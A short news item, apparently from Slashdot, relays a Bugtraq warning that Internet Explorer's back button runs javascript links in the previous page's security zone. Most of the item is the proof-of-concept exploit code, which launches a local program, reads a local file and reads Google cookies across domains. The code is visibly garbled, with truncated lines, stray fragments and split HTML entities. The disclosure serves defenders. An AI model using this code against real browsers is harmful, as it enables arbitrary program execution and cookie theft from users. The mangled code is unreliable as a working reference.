Don't Hit That Back Button
Saint Aardvark writes: "From the Bugtraq mailing list comes this warning: 'Using the Back Button in IE is dangerous'. When hitting the back button, javascript links will be executed in the security zone of the last url viewed. Proof-of-concept included in the warning will execute minesweeper or read your Google cookies."
<html>m 32/winmine.exe')">t em32/winmine.exe')">& gt;m / )">
// Use if not XP1 ';' )";
<h1>Press link and then the backbutton to trigger script.</h1>
<a href="javascript:execFile('file:///c:/winnt/syste
Run Minesweeper (c:/winnt/system32/winmine.exe Win2000 pro)</a><br>
<a href="javascript:execFile('file:///c:/windows/sys
Run Minesweeper (c:/windows/system32/winmine.exe XP, ME etc...)</a><br>
<a href="javascript:readFile('file:///c:/test.txt')"
Read c:\test.txt (needs to be created)</a><br>
<a href="javascript:readCookie('http://www.google.co
Read Google cookie</a>
<script>
// badUrl = "http://www.nonexistingdomain.se";
badUrl = "res:";
function execFile(file){
s = '<object classid=CLSID:11111111-1111-1111-1111-11111111111
s+= 'CODEBASE='+file+'></OBJECT>';
backBug(badUrl,s);
}
function readFile(file){
s = '<iframe name=i src='+file+' style=display:none onload=';
s+= 'alert(i.document.body.innerText)></iframe&g t;';
backBug(badUrl,s);
}
function readCookie(url){
s = '<script>alert(document.cookie);close();< "+"/script>';
backBug(url,s);
}
function backBug(url,payload){
len = history.length;
page = document.location;
s = "javascript:if (history.length!="+len+") {";
s+= "open('javascript:document.write(\""+payload+"\")
s+= ";history.back();} else '<script>location=\""+url
s+= "\";document.title=\""+page+"\";<"+"/script> ';";
location = s;
}
</script>
</html>